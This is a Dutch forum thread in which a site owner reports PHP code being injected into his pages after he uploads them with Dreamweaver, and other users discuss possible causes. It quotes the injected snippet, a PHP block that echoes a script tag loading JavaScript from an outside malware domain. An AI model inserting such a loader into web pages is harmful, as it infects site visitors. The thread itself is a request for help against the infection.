Injectie van code in PHP als ik gebruik maak van Dreamweaver

Status
Niet open voor verdere reacties.

John1969

Nieuwe gebruiker
Lid geworden
27 mei 2014
Berichten
3
Hoi,

Ik maak al lang gebruik van verschillende versies van dreamweaver om sites voor mezelf te maken. Nu zie ik sinds een tijdje dat bij uploaden in de PHP-code nieuwe PHP-code wordt 'geinjecteerd'.
Het ziet er als volgt uit:

HTML:
	<form ACTION="<?php echo $loginFormAction; ?>
<?php
#4b53fb#
if(empty($rn)) {
$rn = "<script src=\"http://calmulanguage.mx/UuoJZXV0.php?id=48762174\" type=\"text/javascript\"></script>";
echo $rn;
}

#/4b53fb#
?>
<?php

?>
<?php

?>
<?php

?>" name="form1" method="POST">

Heeft iemand hier ervaring mee?

Ik hoor het graag.

John
 
Welkom op Helpmij :)

Zo te zien is het een gevalletje website hijacking.

Blijkbaar zijn je formulieren niet veilig en kan elke willekeurige code ingevoerd worden.
Zorg er dus voor dat je de data uit het formulier eerst controleert en filtert voor je er verder dingen mee gaat doen.

Tevens verplaatst naar de PHP-sectie in plaats van Dreamweaver :)
 
Laatst bewerkt:
Ik weet niet hoe het op je systeem komt, maar je mag het niet laten staan: Is namelijk een site die (o.a.) Google niet vertrouwd ("This site may harm your computer.")
Er is dus malware op je site/server.
Mogelijk is je site gehackt en loopt er een script (of iets dergelijks) die bewaakt of er nieuwe .php bestanden bijkomen en die dan injecteert met deze malware.
Ook kan het zijn dat iemand vanaf extern diezelfde bewaking doet, en dus op de een of andere manier toegang heeft tot (de map van) je .php bronbestanden op je site/server.

EDIT: Ik zie zojuist dat ThaDevil iets concreters heeft gemeld dat als oorzaak kan dienen voor je probleem.

Tijs.
 
Welkom op Helpmij :)
Dank je.

Zo te zien is het een gevalletje website hijacking.
Het lijkt me niet dat dit op de server gebeurt. Het gebeurt voor mijn gevoel rond de FTP-sessie (door dreamweaver) wanneer ik de files upload

Blijkbaar zijn je formulieren niet veilig en kan elke willekeurige code ingevoerd worden.
Zorg er dus voor dat je de data uit het formulier eerst controleert en filtert voor je er verder dingen mee gaat doen.
Wat ik toonde was broncode uit mijn PHP pagina. De output van de form is prima (als ik de vreemde code verwijder uit de broncode)....

Tevens verplaatst naar de PHP-sectie in plaats van Dreamweaver :)
Dat vind ik nou jammer.... ik weet dat de code PHP is, maar de fout ontstaat ergens in de communicatie via Dreamweaver.

Ik heb mijn computer op allerlei manieren gescanned op malware en er is niets gevonden.
Ik kan me voorstellen dat er in Dreamweaver een script is dat deze code injecteert.... maar ik ken het systeem niet goed genoeg om dit te vinden.

Ik kan best goed overweg met PHP en Javascript, maar dreamweaver maakt alles wel sneller, dus ik wil eigenlijk niet over op een simpele editor. Dus alle response is welkom.
 
Ik zou het merkwaardig vinden wanneer er tijdens het uploaden via Dreamweaver malware code wordt toegevoegd aan je script.

Dus als ik het goed begrijp dan heb je lokaal nog het normale bestand maar zodra je het upload en je download het bestand direct dan staan die extra regels er tussen?

Eerste logische vraag; heb je jouw computer gescand op virussen?
Tweede vraag; Is de versie van Dreamweaver welke je gebruikt legaal verkregen? Zo niet, dan kan het zijn dat een grappenmaker daar iets meer aan gesleuteld heeft dan alleen de licentie omzeilen :)
 
Ik zie op mijn PC inderdaad de injectie niet, maar na upload wel op de server. Zodoende mijn gedachte dat er misschien wel wat configureerbare code in dreamweaver zit t.a.v. FTP.

Ik heb zelf een licentie van CS5, het probleem deed zich daar ook voor.... dus daarna heb ik CS6.1 gedownload.... zelfde resultaat. Ik zal eens een nieuwe installatie van Windows 7 proberen en een schone installatie van DW5.... eens kijken of dit probleem dan ook bestaat.

Mijn PC is met Avast Internet Security beschermd (gekochte versie) en ik heb daar begin deze week op een opstartscan mee uitgevoerd zonder resultaat.
 
En uploaden met een andere FTP-client geprobeerd?
 
Status
Niet open voor verdere reacties.
Terug
Bovenaan Onderaan